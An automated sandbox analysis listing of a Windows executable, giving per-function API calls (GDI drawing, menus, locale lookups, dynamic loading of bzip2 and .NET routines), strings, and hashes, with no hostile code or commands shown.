                                                                                      • Instruction Fuzzy Hash: 81B14B30600604DFD711EF69C586B9ABBF1AF05305F1485BAE845AB7A3C778AD4CCB1A
                                                                                      APIs
                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004088D0,?,?,?,?,00000000,00000000,00000000,?,004098D7,00000000,004098EA), ref: 004086A2
                                                                                        • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004964C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                                        • Part of subcall function 0040851C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040871E,?,?,?,00000000,004088D0), ref: 0040852F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                      • API String ID: 1044490935-665933166
                                                                                      • Opcode ID: d28892a32a3756e591db26ccf56d4423c4b5dcf68a3e55eb2d1216e614db25d0
                                                                                      • Instruction ID: f7723302c3cbbcbb01f246a146743d61dec29c667e41bc47a3323a0acc4546db
                                                                                      • Opcode Fuzzy Hash: d28892a32a3756e591db26ccf56d4423c4b5dcf68a3e55eb2d1216e614db25d0
                                                                                      • Instruction Fuzzy Hash: CB514A35B00248ABDB01FBAA8941A9F7769DB98308F50D47FA141BB3C6DE3DDA05871D
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,00411869), ref: 004116FC
                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117BA
                                                                                        • Part of subcall function 00411A1C: CreatePopupMenu.USER32 ref: 00411A36
                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411846
                                                                                        • Part of subcall function 00411A1C: CreateMenu.USER32 ref: 00411A40
                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0041182D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                      • String ID: ,$?
                                                                                      • API String ID: 2359071979-2308483597
                                                                                      • Opcode ID: 81cf1368c6a983362ffd0b97e47859e0159252f4e06a36b3365d64b72bbd56ad
                                                                                      • Instruction ID: 3f3527f43cca8a4f6c45e7f3696c032b38f9f6d147acb0657ff8a7652be0e8fd
                                                                                      • Opcode Fuzzy Hash: 81cf1368c6a983362ffd0b97e47859e0159252f4e06a36b3365d64b72bbd56ad
                                                                                      • Instruction Fuzzy Hash: CC511774A001409BDB10EF6ADC81ADA7BF9BF49304B1585BBF904E73A6D738C942CB58
                                                                                      APIs
                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BE98
                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA7
                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BEF8
                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF06
                                                                                      • DeleteObject.GDI32(?), ref: 0041BF0F
                                                                                      • DeleteObject.GDI32(?), ref: 0041BF18
                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF35
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                      • String ID:
                                                                                      • API String ID: 1030595962-0
                                                                                      • Opcode ID: c7b0e75b457b54f40c973da1b74c3022c367d96584a0130cfc4ac672875a8614
                                                                                      • Instruction ID: 2920a3410ecffe373541ee6f53742fd475180ef7da711f6faed1b6e94a947089
                                                                                      • Opcode Fuzzy Hash: c7b0e75b457b54f40c973da1b74c3022c367d96584a0130cfc4ac672875a8614
                                                                                      • Instruction Fuzzy Hash: 0C510571E00219AFCB14DFA9D8819EEB7F9EF48314B11446AF914E7391D738AD81CB64
                                                                                      APIs
                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE6E
                                                                                      • 73A14620.GDI32(00000000,00000026), ref: 0041CE8D
                                                                                      • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEF3
                                                                                      • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF02
                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF6C
                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFAA
                                                                                      • 73A08830.GDI32(?,?,00000001,0041CFDC,00000000,00000026), ref: 0041CFCF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                      • String ID:
                                                                                      • API String ID: 2733548868-0
                                                                                      • Opcode ID: 132354002ca2fdf89728bebe702e6aaf01ac2d906efdfd832a76dcf97bd27496
                                                                                      • Instruction ID: 0295d75a013be80ecc2d975aeb153abe1d20fbb24d7cab5e263b7fb8805ed029
                                                                                      • Opcode Fuzzy Hash: 132354002ca2fdf89728bebe702e6aaf01ac2d906efdfd832a76dcf97bd27496
                                                                                      • Instruction Fuzzy Hash: 6A512970644600AFDB14DFA8C985FABBBF9AF08304F10459AF544DB292C778ED80CB58
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,?,?), ref: 0045559A
                                                                                        • Part of subcall function 004241EC: GetWindowTextA.USER32(?,?,00000100), ref: 0042420C
                                                                                        • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                                        • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E908,?,00000001), ref: 0041EE69
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00455601
                                                                                      • TranslateMessage.USER32(?), ref: 0045561F
                                                                                      • DispatchMessageA.USER32(?), ref: 00455628
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                      • String ID: [Paused]
                                                                                      • API String ID: 1715372110-4230553315
                                                                                      • Opcode ID: 3a95339d3b00b4d4c014ba20a0af633e860cba05bef6b97c8997cd6cdd85c36c
                                                                                      • Instruction ID: 1ea6cdf9f8c4d0006da5c53b80d4ab4df920001bdb03266b2b95788fb80fd04e
                                                                                      • Opcode Fuzzy Hash: 3a95339d3b00b4d4c014ba20a0af633e860cba05bef6b97c8997cd6cdd85c36c
                                                                                      • Instruction Fuzzy Hash: AA31E6309046886ECB11DBB5DC51BEEBBB8EB49314F91447BE804E7292D73C9909CB2D
                                                                                      APIs
                                                                                      • GetCursor.USER32(00000000,004676D3), ref: 00467650
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046765E
                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,004676D3), ref: 00467664
                                                                                      • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,004676D3), ref: 0046766E
                                                                                      • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,004676D3), ref: 00467674
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$LoadSleep
                                                                                      • String ID: CheckPassword
                                                                                      • API String ID: 4023313301-1302249611
                                                                                      • Opcode ID: a0f55fa05c8be1d69f749fc9697138d56db45261ab8bfaff53ea542b656ce6f5
                                                                                      • Instruction ID: 0acf26c21a080d5da0313e65daee1c9aa77075bbb7fadc865c3b9f3c1b589fde
                                                                                      • Opcode Fuzzy Hash: a0f55fa05c8be1d69f749fc9697138d56db45261ab8bfaff53ea542b656ce6f5
                                                                                      • Instruction Fuzzy Hash: 2131B334648744AFD711EB79C88AF9A7BE4AF05318F1580B6B8049F3A2D7789E40CB4D
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457F4B
                                                                                      Strings
                                                                                      • Failed to load .NET Framework DLL "%s", xrefs: 00457F30
                                                                                      • CreateAssemblyCache, xrefs: 00457F42
                                                                                      • Fusion.dll, xrefs: 00457EEB
                                                                                      • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00457F56
                                                                                      • .NET Framework CreateAssemblyCache function failed, xrefs: 00457F6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                      • API String ID: 190572456-3990135632
                                                                                      • Opcode ID: 6892959eac5292d5a5ac2a2cadbd2d0bd37bbeac1c13b492763255e4aa9e87a2
                                                                                      • Instruction ID: a43b4c24682a544c2646696e4a275acb35fc84741e5fc719d5cb135cb267c29f
                                                                                      • Opcode Fuzzy Hash: 6892959eac5292d5a5ac2a2cadbd2d0bd37bbeac1c13b492763255e4aa9e87a2
                                                                                      • Instruction Fuzzy Hash: 5331A771E046096FCB11EFA5D881A9FB7B4AF04715F50857AF814A7382DB3899088799
                                                                                      APIs
                                                                                        • Part of subcall function 0041BFB8: GetObjectA.GDI32(?,00000018), ref: 0041BFC5
                                                                                      • GetFocus.USER32 ref: 0041C0D8
                                                                                      • 73A0A570.USER32(?), ref: 0041C0E4
                                                                                      • 73A08830.GDI32(?,?,00000000,00000000,0041C163,?,?), ref: 0041C105
                                                                                      • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C163,?,?), ref: 0041C111
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C128
                                                                                      • 73A08830.GDI32(?,00000000,00000000,0041C16A,?,?), ref: 0041C150
                                                                                      • 73A0A480.USER32(?,?,0041C16A,?,?), ref: 0041C15D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A08830$A022A480A570BitsFocusObject
                                                                                      • String ID:
                                                                                      • API String ID: 1424713005-0
                                                                                      • Opcode ID: b5ec816d879f7673cf2204928d24ade75243476a1e646848f60b5da6794254d2
                                                                                      • Instruction ID: be6d8328aec04e85a436dd0cf8ae2147a44d9b66c6d411dca3268b31211d8f12
                                                                                      • Opcode Fuzzy Hash: b5ec816d879f7673cf2204928d24ade75243476a1e646848f60b5da6794254d2
                                                                                      • Instruction Fuzzy Hash: B2116A71A40618BFDB10DBA9CC86FAFB7FCEF48700F54446AB514E7281D6789D008B68
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0047E490), ref: 0047E475
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                      • API String ID: 47109696-2530820420
                                                                                      • Opcode ID: 3fe8207b4309967a2eec740b8de24a374655ee6a60c09589a25f0ee3bbab2cf7
                                                                                      • Instruction ID: 46a45326e1d9b5ff3e072bf084057b1a8ce9b2520be3d98a23739a38d90d80f2
                                                                                      • Opcode Fuzzy Hash: 3fe8207b4309967a2eec740b8de24a374655ee6a60c09589a25f0ee3bbab2cf7
                                                                                      • Instruction Fuzzy Hash: 8F11BB30714204AADB10DA778806BDA3AA8EB09358F51C5B7A908E7392EB7C9901C75C
                                                                                      APIs
                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                                      • DeleteDC.GDI32(?), ref: 0041B449
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$Delete$Stretch
                                                                                      • String ID:
                                                                                      • API String ID: 1458357782-0
                                                                                      • Opcode ID: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                                      • Instruction ID: 073f11bba2386bee955988a390c3df6f0cbda7ed7a331810ab0cae2060ca734e
                                                                                      • Opcode Fuzzy Hash: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                                      • Instruction Fuzzy Hash: F9114C72E40659ABDF10D6D9D985FAFB3BCEF08704F048456B614FB242C678A8418B54
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,?,00000000), ref: 0048FCC5
                                                                                        • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0048FCE7
                                                                                      • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0049023D), ref: 0048FCFB
                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 0048FD1D
                                                                                      • 73A0A480.USER32(00000000,00000000,0048FD47,0048FD40,?,00000000,?,?,00000000), ref: 0048FD3A
                                                                                      Strings
                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0048FCF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                      • API String ID: 1435929781-222967699
                                                                                      • Opcode ID: 3db6766931fef7b11a742d2f2d9c48b6603b492ecea0d86a82d8ef65d75c1a51
                                                                                      • Instruction ID: be2ae6e373cd916ce709c39e3fbc403556832e2453e100614d5f9d9249756fbf
                                                                                      • Opcode Fuzzy Hash: 3db6766931fef7b11a742d2f2d9c48b6603b492ecea0d86a82d8ef65d75c1a51
                                                                                      • Instruction Fuzzy Hash: BE018876604604BFEB01EBA5CC45F5FB3ECDB49704F510476B604E7281D678AD008B68
                                                                                      APIs
                                                                                      • GetCursorPos.USER32 ref: 0042331F
                                                                                      • WindowFromPoint.USER32(?,?), ref: 0042332C
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042333A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00423341
                                                                                      • SendMessageA.USER32(00000000,00000084,?,?), ref: 0042335A
                                                                                      • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423371
                                                                                      • SetCursor.USER32(00000000), ref: 00423383
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1770779139-0
                                                                                      • Opcode ID: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                                      • Instruction ID: 4e500bdd1cb7c406dcecfc45487f359b17b305850d12e3c552a5b3a09f906ed3
                                                                                      • Opcode Fuzzy Hash: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                                      • Instruction Fuzzy Hash: EC01D4223043103AD620BB795C86E3F26A8CFC5B55F50417FB909BE283DA3D8D0163AD
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0048FAE8
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048FAF5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048FB02
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                      • API String ID: 667068680-2254406584
                                                                                      • Opcode ID: 06817d94493c4b11f4ceaf649244f67311709392a4fb54af9b6a7fbece0388f4
                                                                                      • Instruction ID: 57668858e8c0b0289ac4f884962ff5c073460ec000cf1e14312be6c8289e998d
                                                                                      • Opcode Fuzzy Hash: 06817d94493c4b11f4ceaf649244f67311709392a4fb54af9b6a7fbece0388f4
                                                                                      • Instruction Fuzzy Hash: 1BF0F652B41B1466D620357A8CA2E7FA1CDCB95770F140937BE04A7382E95DAC0E43BD
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045BD6D
                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045BD7D
                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045BD8D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                      • API String ID: 190572456-212574377
                                                                                      • Opcode ID: e6e2d7970eb20b2f2d3a2813d8870e9f0062fcf45f3e9ec5bea086149b4b188d
                                                                                      • Instruction ID: 56c68a15e36e3577f8296096390340765d2f33f8892a2948cb77f36bf455d425
                                                                                      • Opcode Fuzzy Hash: e6e2d7970eb20b2f2d3a2813d8870e9f0062fcf45f3e9ec5bea086149b4b188d
                                                                                      • Instruction Fuzzy Hash: 55F01DB2D18700DADB04DF32AC8176236A5E768316F14803BAA45562A2D77C084CCB5C
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(oleacc.dll,?,0044EABD), ref: 0044C21F
                                                                                      • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C230
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C240
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                      • API String ID: 2238633743-1050967733
                                                                                      • Opcode ID: 070ab4bd4afa3ae6b6d67b7cdbce7e38f91889c9ccd0faa5c964c3c5c3461b15
                                                                                      • Instruction ID: 433fed67622e38403ad12c2b69c23a269c66bc576510ece0f105dc57e33200d4
                                                                                      • Opcode Fuzzy Hash: 070ab4bd4afa3ae6b6d67b7cdbce7e38f91889c9ccd0faa5c964c3c5c3461b15
                                                                                      • Instruction Fuzzy Hash: 76F0FEB0A427018AEB50ABF5DDC57123294F32070CF1951BBA001561A1C7FE5588CA2D
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0049036E,QueryCancelAutoPlay,0049324C), ref: 0042E76A
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
                                                                                      • InterlockedExchange.KERNEL32(00496660,00000001), ref: 0042E781
                                                                                      • ChangeWindowMessageFilter.USER32(0000C199,00000001), ref: 0042E792
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
